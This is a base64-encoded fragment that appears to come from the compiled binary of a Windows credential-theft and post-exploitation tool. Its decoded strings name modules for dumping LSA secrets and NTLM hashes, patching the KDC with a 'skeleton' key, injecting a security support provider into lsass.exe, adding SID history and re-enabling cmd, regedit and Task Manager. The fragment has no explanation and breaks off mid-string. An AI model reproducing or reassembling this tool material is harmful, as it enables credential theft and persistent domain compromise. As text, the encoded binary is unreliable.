IAeQBwAHQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AcwBlAGMAXwBhAGUAcwAyADUANgAgADsAIABDAHIAeQBwAHQASQBtAHAAbwByAHQASwBlAHkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAU2FtSUNvbm5lY3QAAAAAAFNhbXJDbG9zZUhhbmRsZQBTYW1JUmV0cmlldmVQcmltYXJ5Q3JlZGVudGlhbHMAAFNhbXJPcGVuRG9tYWluAABTYW1yT3BlblVzZXIAAAAAU2FtclF1ZXJ5SW5mb3JtYXRpb25Vc2VyAAAAAAAAAABTYW1JRnJlZV9TQU1QUl9VU0VSX0lORk9fQlVGRkVSAExzYUlRdWVyeUluZm9ybWF0aW9uUG9saWN5VHJ1c3RlZAAAAAAAAABMc2FJRnJlZV9MU0FQUl9QT0xJQ1lfSU5GT1JNQVRJT04AAAAAAAAAVmlydHVhbEFsbG9jAAAAAExvY2FsRnJlZQAAAG1lbWNweQAAAAAAAHAAYQB0AGMAaAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBsAHMAYQAgADsAIABrAHUAbABsAF8AbQBfAHAAYQB0AGMAaAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AbABzAGEAIAA7ACAAawB1AGwAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AZwBlAHQAVgBlAHIAeQBCAGEAcwBpAGMATQBvAGQAdQBsAGUASQBuAGYAbwByAG0AYQB0AGkAbwBuAHMARgBvAHIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAGkAbgBqAGUAYwB0AAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGwAcwBhACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAG0AbwB0AGUAbABpAGIAXwBDAHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBDAG8AZABlAFcAaQB0AHQAaABQAGEAdAB0AGUAcgBuAFIAZQBwAGwAYQBjAGUACgAAAAAAAAAAAEQAbwBtAGEAaQBuACAAOgAgACUAdwBaACAALwAgAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBsAHMAYQAgADsAIABTAGEAbQBMAG8AbwBrAHUAcABJAGQAcwBJAG4ARABvAG0AYQBpAG4AIAAlADAAOAB4AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AbABzAGEAIAA7ACAAJwAlAHMAJwAgAGkAcwAgAG4AbwB0ACAAYQAgAHYAYQBsAGkAZAAgAEkAZAAKAAAAAABuAGEAbQBlAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBsAHMAYQAgADsAIABTAGEAbQBMAG8AbwBrAHUAcABOAGEAbQBlAHMASQBuAEQAbwBtAGEAaQBuACAAJQAwADgAeAAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AbABzAGEAIAA7ACAAUwBhAG0ARQBuAHUAbQBlAHIAYQB0AGUAVQBzAGUAcgBzAEkAbgBEAG8AbQBhAGkAbgAgACUAMAA4AHgACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBsAHMAYQAgADsAIABTAGEAbQBPAHAAZQBuAEQAbwBtAGEAaQBuACAAJQAwADgAeAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBsAHMAYQAgADsAIABTAGEAbQBDAG8AbgBuAGUAYwB0ACAAJQAwADgAeAAKAAAAUwBhAG0AUwBzAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AbABzAGEAXwBnAGUAdABIAGEAbgBkAGwAZQAgADsAIABPAHAAZQBuAFAAcgBvAGMAZQBzAHMAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBsAHMAYQBfAGcAZQB0AEgAYQBuAGQAbABlACAAOwAgAGsAdQBsAGwAXwBtAF8AcwBlAHIAdgBpAGMAZQBfAGcAZQB0AFUAbgBpAHEAdQBlAEYAbwByAE4AYQBtAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAACgBSAEkARAAgACAAOgAgACUAMAA4AHgAIAAoACUAdQApAAoAVQBzAGUAcgAgADoAIAAlAHcAWgAKAAAAAAAAAEwATQAgACAAIAA6ACAAAAAKAE4AVABMAE0AIAA6ACAAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGwAcwBhAF8AdQBzAGUAcgAgADsAIABTAGEAbQBRAHUAZQByAHkASQBuAGYAbwByAG0AYQB0AGkAbwBuAFUAcwBlAHIAIAAlADAAOAB4AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AbABzAGEAXwB1AHMAZQByACAAOwAgAFMAYQBtAE8AcABlAG4AVQBzAGUAcgAgACUAMAA4AHgACgAAAAAAAAB1AG4AawBuAG8AdwBuAAAACgAgACoAIAAlAHMACgAAACAAIAAgACAATABNACAAIAAgADoAIAAAAAoAIAAgACAAIABOAFQATABNACAAOgAgAAAAAAAAAAAAIAAgACAAIAAlAC4AKgBzAAoAAAAAAAAAIAAgACAAIAAlADAAMgB1ACAAIAAAAAAAIAAgACAAIABEAGUAZgBhAHUAbAB0ACAAUwBhAGwAdAAgADoAIAAlAC4AKgBzAAoAAAAAAAAAAABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAAABPAGwAZABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAAAAAACAAIAAgACAARABlAGYAYQB1AGwAdAAgAFMAYQBsAHQAIAA6ACAAJQAuACoAcwAKACAAIAAgACAARABlAGYAYQB1AGwAdAAgAEkAdABlAHIAYQB0AGkAbwBuAHMAIAA6ACAAJQB1AAoAAAAAAAAAAABTAGUAcgB2AGkAYwBlAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAAAAAATwBsAGQAZQByAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAAAAAAAAAAACAAIAAgACAAJQBzAAoAAAAgACAAIAAgACAAIAAlAHMAIAA6ACAAAAAgACAAIAAgACAAIAAlAHMAIAAoACUAdQApACAAOgAgAAAAAAAAAAAAbQBzAHYAYwByAHQALgBkAGwAbAAAAAAAYQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbgBnAAAAAABkAGkAcwBjAG8AdgBlAHIAaQBuAGcAAABhAHMAcwBvAGMAaQBhAHQAaQBuAGcAAABkAGkAcwBjAG8AbgBuAGUAYwB0AGUAZAAAAAAAAAAAAGQAaQBzAGMAbwBuAG4AZQBjAHQAaQBuAGcAAAAAAAAAYQBkAF8AaABvAGMAXwBuAGUAdAB3AG8AcgBrAF8AZgBvAHIAbQBlAGQAAAAAAAAAYwBvAG4AbgBlAGMAdABlAGQAAAAAAAAAbgBvAHQAXwByAGUAYQBkAHkAAAAAAAAAcwBrAGUAbABlAHQAbwBuAAAAAAAAAAAAbQBlAG0AcwBzAHAAAAAAAGEAZABkAHMAaQBkAAAAAAB3AGkAZgBpAAAAAAAAAAAAWwBlAHgAcABlAHIAaQBtAGUAbgB0AGEAbABdACAAVAByAHkAIAB0AG8AIABlAG4AdQBtAGUAcgBhAHQAZQAgAGEAbABsACAAbQBvAGQAdQBsAGUAcwAgAHcAaQB0AGgAIABEAGUAdABvAHUAcgBzAC0AbABpAGsAZQAgAGgAbwBvAGsAcwAAAGQAZQB0AG8AdQByAHMAAAAAAAAAAAAAAEoAdQBuAGkAcABlAHIAIABOAGUAdAB3AG8AcgBrACAAQwBvAG4AbgBlAGMAdAAgACgAdwBpAHQAaABvAHUAdAAgAHIAbwB1AHQAZQAgAG0AbwBuAGkAdABvAHIAaQBuAGcAKQAAAAAAbgBjAHIAbwB1AHQAZQBtAG8AbgAAAAAAVABhAHMAawAgAE0AYQBuAGEAZwBlAHIAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKAB3AGkAdABoAG8AdQB0ACAARABpAHMAYQBiAGwAZQBUAGEAcwBrAE0AZwByACkAAAAAAAAAAAB0AGEAcwBrAG0AZwByAAAAAAAAAAAAAABSAGUAZwBpAHMAdAByAHkAIABFAGQAaQB0AG8AcgAgACAAIAAgACAAIAAgACAAIAAoAHcAaQB0AGgAbwB1AHQAIABEAGkAcwBhAGIAbABlAFIAZQBnAGkAcwB0AHIAeQBUAG8AbwBsAHMAKQAAAAAAcgBlAGcAZQBkAGkAdAAAAEMAbwBtAG0AYQBuAGQAIABQAHIAbwBtAHAAdAAgACAAIAAgACAAIAAgACAAIAAgACgAdwBpAHQAaABvAHUAdAAgAEQAaQBzAGEAYgBsAGUAQwBNAEQAKQAAAAAAAAAAAGMAbQBkAAAATQBpAHMAYwBlAGwAbABhAG4AZQBvAHUAcwAgAG0AbwBkAHUAbABlAAAAAAAAAAAAbQBpAHMAYwAAAAAAAAAAAHcAbABhAG4AYQBwAGkAAABXbGFuT3BlbkhhbmRsZQAAV2xhbkNsb3NlSGFuZGxlAFdsYW5FbnVtSW50ZXJmYWNlcwAAAAAAAFdsYW5HZXRQcm9maWxlTGlzdAAAAAAAAFdsYW5HZXRQcm9maWxlAABXbGFuRnJlZU1lbW9yeQAASwBpAHcAaQBBAG4AZABDAE0ARAAAAAAARABpAHMAYQBiAGwAZQBDAE0ARAAAAAAAYwBtAGQALgBlAHgAZQAAAEsAaQB3AGkAQQBuAGQAUgBlAGcAaQBzAHQAcgB5AFQAbwBvAGwAcwAAAAAAAAAAAEQAaQBzAGEAYgBsAGUAUgBlAGcAaQBzAHQAcgB5AFQAbwBvAGwAcwAAAAAAAAAAAHIAZQBnAGUAZABpAHQALgBlAHgAZQAAAEsAaQB3AGkAQQBuAGQAVABhAHMAawBNAGcAcgAAAAAARABpAHMAYQBiAGwAZQBUAGEAcwBrAE0AZwByAAAAAAB0AGEAcwBrAG0AZwByAC4AZQB4AGUAAABkAHMATgBjAFMAZQByAHYAaQBjAGUAAAAJACgAJQB3AFoAKQAAAAAACQBbACUAdQBdACAAJQB3AFoAIAAhACAAAAAAAAAAAAAlAC0AMwAyAFMAAAAAAAAAIwAgACUAdQAAAAAAAAAAAAkAIAAlAHAAIAAtAD4AIAAlAHAAAAAAACUAdwBaACAAKAAlAHUAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAGQAZQB0AG8AdQByAHMAXwBjAGEAbABsAGIAYQBjAGsAXwBwAHIAbwBjAGUAcwBzACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAFAAYQB0AGMAaAAgAE8ASwAgAGYAbwByACAAJwAlAHMAJwAgAGYAcgBvAG0AIAAnACUAcwAnACAAdABvACAAJwAlAHMAJwAgAEAAIAAlAHAACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAGcAZQBuAGUAcgBpAGMAXwBuAG8AZwBwAG8AXwBwAGEAdABjAGgAIAA7ACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAIAAqACAAAAAgAC8AIAAlAHMAIAAtACAAJQBzAAoAAAAJAHwAIAAlAHMACgAAAAAAbgB0AGQAcwAAAAAAAAAAAG4AdABkAHMAYQBpAC4AZABsAGwAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AYQBkAGQAcwBpAGQAIAA7ACAAawB1AGwAbABfAG0AXwBtAGUAbQBvAHIAeQBfAGMAbwBwAHkAIAAoAGIAYQBjAGsAdQBwACkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAFMAZQBhAHIAYwBoACAAJQB1ACAAOgAgAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBzAGMAXwBhAGQAZABzAGkAZAAgADsAIABrAHUAbABsAF8AbQBfAG0AZQBtAG8AcgB5AF8AcwBlAGEAcgBjAGgAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAGEAZABkAHMAaQBkACAAOwAgAGsAdQBsAGwAXwBtAF8AbQBlAG0AbwByAHkAXwBjAG8AcAB5ACAAKAAwAHgAJQAwADgAeAApAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBzAGMAXwBhAGQAZABzAGkAZAAgADsAIABrAHUAbABsAF8AbQBfAG0AZQBtAG8AcgB5AF8AcAByAG8AdABlAGMAdAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABTAEkARABIAGkAcwB0AG8AcgB5ACAAZgBvAHIAIAAnACUAcwAnAAoAAAAAAAAAAAAgACoAIAAlAHMACQAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBzAGMAXwBhAGQAZABzAGkAZAAgADsAIABEAHMAQQBkAGQAUwBpAGQASABpAHMAdABvAHIAeQA6ACAAMAB4ACUAMAA4AHgAIAAoACUAdQApACEACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAGEAZABkAHMAaQBkACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBzAGMAXwBhAGQAZABzAGkAZAAgADsAIABEAHMAQgBpAG4AZAA6ACAAJQAwADgAeAAgACgAJQB1ACkAIQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBzAGMAXwBhAGQAZABzAGkAZAAgADsAIABPAFMAIABuAG8AdAAgAHMAdQBwAHAAbwByAHQAZQBkACAAKABvAG4AbAB5ACAAdwAyAGsAOAByADIAIAAmACAAdwAyAGsAMQAyAHIAMgApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBzAGMAXwBhAGQAZABzAGkAZAAgADsAIABJAHQAIAByAGUAcQB1AGkAcgBlAHMAIABhAHQAIABsAGUAYQBzAHQAIAAyACAAYQByAGcAcwAKAAAAZm9wZW4AAABmd3ByaW50ZgAAAABmY2xvc2UAAAAAAABsAHMAYQBzAHMALgBlAHgAZQAAAAAAAABtAHMAdgAxAF8AMAAuAGQAbABsAAAAAABJAG4AagBlAGMAdABlAGQAIAA9ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAG0AZQBtAHMAcwBwACAAOwAgAGsAdQBsAGwAXwBtAF8AbQBlAG0AbwByAHkAXwBjAG8AcAB5ACAALQAgAFQAcgBhAG0AcABvAGwAaQBuAGUAIABuADAAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAG0AZQBtAHMAcwBwACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAG0AbwB0AGUAbABpAGIAXwBDAHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBDAG8AZABlAFcAaQB0AHQAaABQAGEAdAB0AGUAcgBuAFIAZQBwAGwAYQBjAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAG0AZQBtAHMAcwBwACAAOwAgAGsAdQBsAGwAXwBtAF8AbQBlAG0AbwByAHkAXwBjAG8AcAB5ACAALQAgAFQAcgBhAG0AcABvAGwAaQBuAGUAIABuADEAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAG0AZQBtAHMAcwBwACAAOwAgAGsAdQBsAGwAXwBtAF8AbQBlAG0AbwByAHkAXwBjAG8AcAB5ACAALQAgAHIAZQBhAGwAIABhAHMAbQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAG0AZQBtAHMAcwBwACAAOwAgAGsAdQBsAGwAXwBtAF8AbQBlAG0AbwByAHkAXwBzAGUAYQByAGMAaAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AbQBlAG0AcwBzAHAAIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAG0AZQBtAHMAcwBwACAAOwAgAGsAdQBsAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGcAZQB0AFAAcgBvAGMAZQBzAHMASQBkAEYAbwByAE4AYQBtAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAExvY2FsQWxsb2MAAAAAAABrAGQAYwBzAHYAYwAuAGQAbABsAAAAAABbAEsARABDAF0AIABkAGEAdABhAAoAAABbAEsARABDAF0AIABzAHQAcgB1AGMAdAAKAAAAAAAAAFsASwBEAEMAXQAgAGsAZQB5AHMAIABwAGEAdABjAGgAIABPAEsACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAHMAawBlAGwAZQB0AG8AbgAgADsAIABTAGUAYwBvAG4AZAAgAHAAYQB0AHQAZQByAG4AIABuAG8AdAAgAGYAbwB1AG4AZAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBzAGMAXwBzAGsAZQBsAGUAdABvAG4AIAA7ACAARgBpAHIAcwB0ACAAcABhAHQAdABlAHIAbgAgAG4AbwB0ACAAZgBvAHUAbgBkAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AcwBrAGUAbABlAHQAbwBuACAAOwAgAGsAdQBsAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGcAZQB0AFYAZQByAHkAQgBhAHMAaQBjAE0AbwBkAHUAbABlAEkAbgBmAG8AcgBtAGEAdABpAG8AbgBzAEYAbwByAE4AYQBtAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAGMAcgB5AHAAdABkAGwAbAAuAGQAbABsAAAAAAAAAAAAWwBSAEMANABdACAAZgB1AG4AYwB0AGkAbwBuAHMACgAAAAAAAAAAAFsAUgBDADQAXQAgAGkAbgBpAHQAIABwAGEAdABjAGgAIABPAEsACgAAAAAAAAAAAFsAUgBDADQAXQAgAGQAZQBjAHIAeQBwAHQAIABwAGEAdABjAGgAIABPAEsACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAHMAawBlAGwAZQB0AG8AbgAgADsAIABVAG4AYQBiAGwAZQAgAHQAbwAgAGMAcgBlAGEAdABlACAAcgBlAG0AbwB0AGUAIABmAHUAbgBjAHQAaQBvAG4AcwAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AcwBrAGUAbABlAHQAbwBuACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABnAHIAbwB1AHAAAAAAAAAAbABvAGMAYQBsAGcAcgBvAHUAcAAAAAAAbgBlAHQAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAE8AcABlAG4ARABvAG0AYQBpAG4AIABCAHUAaQBsAHQAaQBuACAAKAA/ACkAIAAlADAAOAB4AAoAAAAKAEQAbwBtAGEAaQBuACAAbgBhAG0AZQAgADoAIAAlAHcAWgAAAAAACgBEAG8AbQBhAGkAbgAgAFMASQBEACAAIAA6ACAAAAAKACAAJQAtADUAdQAgACUAdwBaAAAAAAAKACAAfAAgACUALQA1AHUAIAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAEwAbwBvAGsAdQBwAEkAZABzAEkAbgBEAG8AbQBhAGkAbgAgACUAMAA4AHgAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AdQBzAGUAcgAgADsAIABTAGEAbQBHAGUAdABHAHIAbwB1AHAAcwBGAG8AcgBVAHMAZQByACAAJQAwADgAeAAAAAAAAAAAAAoAIAB8AGAAJQAtADUAdQAgAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAEcAZQB0AEEAbABpAGEAcwBNAGUAbQBiAGUAcgBzAGgAaQBwACAAJQAwADgAeAAAAAAACgAgAHwAtAAlAC0ANQB1ACAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAHUAcwBlAHIAIAA7ACAAUwBhAG0AUgBpAGQAVABvAFMAaQBkACAAJQAwADgAeAAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAHUAcwBlAHIAIAA7ACAAUwBhAG0ATwBwAGUAbgBVAHMAZQByACAAJQAwADgAeAAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAHUAcwBlAHIAIAA7ACAAUwBhAG0ARQBuAHUAbQBlAHIAYQB0AGUAVQBzAGUAcgBzAEkAbgBEAG8AbQBhAGkAbgAgACUAMAA4AHgAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAE8AcABlAG4ARABvAG0AYQBpAG4AIAAlADAAOAB4AAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAEwAbwBvAGsAdQBwAEQAbwBtAGEAaQBuAEkAbgBTAGEAbQBTAGUAcgB2AGUAcgAgACUAMAA4AHgAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AdQBzAGUAcgAgADsAIABTAGEAbQBFAG4AdQBtAGUAcgBhAHQAZQBEAG8AbQBhAGkAbgBzAEkAbgBTAGEAbQBTAGUAcgB2AGUAcgAgACUAMAA4AHgACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAEMAbwBuAG4AZQBjAHQAIAAlADAAOAB4AAoAAAAAAAAAAABBAHMAawAgAGQAZQBiAHUAZwAgAHAAcgBpAHYAaQBsAGUAZwBlAAAAZABlAGIAdQBnAAAAAAAAAFAAcgBpAHYAaQBsAGUAZwBlACAAbQBvAGQAdQBsAGUAAAAAAAAAAABwAHIAaQB2AGkAbABlAGcAZQAAAAAAAABQAHIAaQB2AGkAbABlAGcAZQAgACcAJQB1ACcAIABPAEsACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHAAcgBpAHYAaQBsAGUAZwBlAF8AcwBpAG0AcABsAGUAIAA7ACAAUgB0AGwAQQBkAGoAdQBzAHQAUAByAGkAdgBpAGwAZQBnAGUAIAAoACUAdQApACAAJQAwADgAeAAKAAAAAAAAAFIAZQBzAHUAbQBlACAAYQAgAHAAcgBvAGMAZQBzAHMAAAAAAAAAAAByAGUAcwB1AG0AZQAAAAAAUwB1AHMAcABlAG4AZAAgAGEAIABwAHIAbwBjAGUAcwBzAAAAAAAAAHMAdQBzAHAAZQBuAGQAAABUAGUAcgBtAGkAbgBhAHQAZQAgAGEAIABwAHIAbwBjAGUAcwBzAAAAcwB0AG8AcAAAAAAAAAAAAFMAdABhAHIAdAAgAGEAIABwAHIAbwBjAGUAcwBzAAAAcwB0AGEAcgB0AAAAAAAAAEwAaQBzAHQAIABpAG0AcABvAHIAdABzAAAAAAAAAAAAaQBtAHAAbwByAHQAcwAAAEwAaQBzAHQAIABlAHgAcABvAHIAdABzAAAAAAAAAAAAZQB4AHAAbwByAHQAcwAAAFAAcgBvAGMAZQBzAHMAIABtAG8AZAB1AGwAZQAAAAAAVAByAHkAaQBuAGcAIAB0AG8AIABzAHQAYQByAHQAIAAiACUAcwAiACAAOgAgAAAATwBLACAAIQAgACgAUABJAEQAIAAlAHUAKQAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAHMAdABhAHIAdAAgADsAIABrAHUAbABsAF8AbQBfAHAAcgBvAGMAZQBzAHMAXwBjAHIAZQBhAHQAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAATgB0AFQAZQByAG0AaQBuAGEAdABlAFAAcgBvAGMAZQBzAHMAAAAAAE4AdABTAHUAcwBwAGUAbgBkAFAAcgBvAGMAZQBzAHMAAAAAAAAAAABOAHQAUgBlAHMAdQBtAGUAUAByAG8AYwBlAHMAcwAAACUAcwAgAG8AZgAgACUAdQAgAFAASQBEACAAOgAgAE8ASwAgACEACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGcAZQBuAGUAcgBpAGMATwBwAGUAcgBhAHQAaQBvAG4AIAA7ACAAJQBzACAAMAB4ACUAMAA4AHgACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHAAcgBvAGMAZQBzAHMAXwBnAGUAbgBlAHIAaQBjAE8AcABlAHIAYQB0AGkAbwBuACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGcAZQBuAGUAcgBpAGMATwBwAGUAcgBhAHQAaQBvAG4AIAA7ACAAcABpAGQAIAAoAC8AcABpAGQAOgAxADIAMwApACAAaQBzACAAbQBpAHMAcwBpAG4AZwAAAAAAAAAlAHUACQAlAHcAWgAKAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHAAcgBvAGMAZQBzAHMAXwBjAGEAbABsAGIAYQBjAGsAUAByAG8AYwBlAHMAcwAgADsAIABPAHAAZQBuAFAAcgBvAGMAZQBzAHMAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGMAYQBsAGwAYgBhAGMAawBQAHIAbwBjAGUAcwBzACAAOwAgAGsAdQBsAGwAXwBtAF8AbQBlAG0AbwByAHkAXwBvAHAAZQBuACAAKAAwAHgAJQAwADgAeAApAAoAAAAKACUAdwBaAAAAAAAAAAAACgAJACUAcAAgAC0APgAgACUAdQAAAAAACQAlAHUAAAAJACAAAAAAAAkAJQBwAAAACQAlAFMAAAAJAC0APgAgACUAUwAAAAAACgAJACUAcAAgAC0APgAgACUAcAAJACUAUwAgACEAIAAAAAAAJQBTAAAAAAAAAAAAIwAlAHUAAABMAGkAcwB0ACAAcwBlAHIAdgBpAGMAZQBzAAAAAAAAAFMAaAB1AHQAZABvAHcAbgAgAHMAZQByAHYAaQBjAGUAAAAAAAAAAABzAGgAdQB0AGQAbwB3AG4AAAAAAAAAAABQAHIAZQBzAGgAdQB0AGQAbwB3AG4AIABzAGUAcgB2AGkAYwBlAAAAcAByAGUAcwBoAHUAdABkAG8AdwBuAAAAUgBlAHMAdQBtAGUAIABzAGUAcgB2AGkAYwBlAAAAAABTAHUAcwBwAGUAbgBkACAAcwBlAHIAdgBpAGMAZQAAAFMAdABvAHAAIABzAGUAcgB2AGkAYwBlAAAAAAAAAAAAUgBlAG0AbwB2AGUAIABzAGUAcgB2AGkAYwBlAAAAAABTAHQAYQByAHQAIABzAGUAcgB2AGkAYwBlAAAAAAAAAFMAZQByAHYAaQBjAGUAIABtAG8AZAB1AGwAZQAAAAAAJQBzACAAJwAlAHMAJwAgAHMAZQByAHYAaQBjAGUAIAA6ACAAAAAAAEUAUgBSAE8AUgAgAGcAZQBuAGUAcgBpAGMARgB1AG4AYwB0AGkAbwBuACAAOwAgAFMAZQByAHY